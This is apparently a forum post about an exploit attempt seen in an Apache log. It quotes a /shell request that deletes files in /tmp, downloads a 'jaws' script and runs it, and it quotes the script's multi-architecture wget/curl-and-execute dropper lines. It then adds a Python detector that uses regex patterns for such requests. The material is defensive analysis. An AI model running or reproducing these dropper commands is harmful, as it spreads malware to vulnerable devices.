
28 May 2021, 8:01 p.m.
Saw a line like this pop up in the Apache log on my public-facing server from yesterday:

    "GET /shell?cd+/tmp;rm+-rf+*;wget+ «redacted»/jaws;sh+/tmp/jaws"

I checked, and the file it is trying to fetch and execute still exists. It consists of about a dozen lines, all of this form:

    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget «redacted»/z0r0.«ext»; curl -O «redacted»/z0r0.«ext»; cat z0r0.«ext» >zeros6x; chmod +x *; ./zeros6x jaws.exploit

all differing only in «ext», with values like “mips” and “mpsl” and “ppc”, “arm”, “arm5”, “arm6”, “arm7”, even “m68k”, plus of course “x86” and “i686”.
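
A way to find requests like the one quoted above in an Apache access log, as an added example that is not part of the original post. It also covers percent-encoded query strings, which the post does not show; the log lines, the host `downloader.invalid` and the status codes are constructed, and the pattern lists are heuristics chosen for this sketch.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined format: host ident user [time] "request" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')

# Heuristic indicators (assumptions of this sketch, tune for your own traffic).
CHAIN_RE = re.compile(r'[;|`]|\$\(')             # shell command chaining
FETCH_RE = re.compile(r'\b(?:wget|curl|tftp)\b')  # remote file download
EXEC_RE = re.compile(r'\b(?:sh|bash|chmod)\b')    # run or mark executable

# Constructed sample lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE = [
    '203.0.113.7 - - [27/May/2021:03:14:15 +0000] "GET /shell?cd+/tmp;rm+-rf+*;'
    'wget+http://downloader.invalid/jaws;sh+/tmp/jaws HTTP/1.1" 404 196 "-" "-"',
    '198.51.100.4 - - [27/May/2021:03:15:02 +0000] '
    '"GET /search?q=curl+tutorial&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/May/2021:03:16:40 +0000] "GET /cgi-bin/x?a=%3Bwget%20http'
    '%3A%2F%2Fdownloader.invalid%2Fz%3Bchmod%20%2Bx%20z HTTP/1.1" 200 12 "-" "-"',
]

def classify(request):
    """Return the indicator names found in the query string of a request line."""
    parts = request.split(" ")
    if len(parts) < 2:
        return []
    query = parts[1].partition("?")[2]
    decoded = unquote_plus(query)  # '+' and %XX forms both become plain text
    checks = (("shell-chaining", CHAIN_RE), ("downloader", FETCH_RE), ("exec", EXEC_RE))
    return [name for name, rx in checks if rx.search(decoded)]

def scan(lines, min_indicators=2):
    """Return (host, status, indicators) for lines with at least min_indicators hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = classify(m.group("req"))
        if len(found) >= min_indicators:
            hits.append((m.group("host"), int(m.group("status")), found))
    return hits

if __name__ == "__main__":
    for host, status, found in scan(SAMPLE):
        # A 2xx status deserves a closer look than a 404: something answered at that path.
        print(f"{host} status={status} indicators={','.join(found)}")
```

Requiring two indicators keeps an ordinary search for the word "curl" from being reported, while the returned status separates requests that hit a missing path from ones that some handler actually answered.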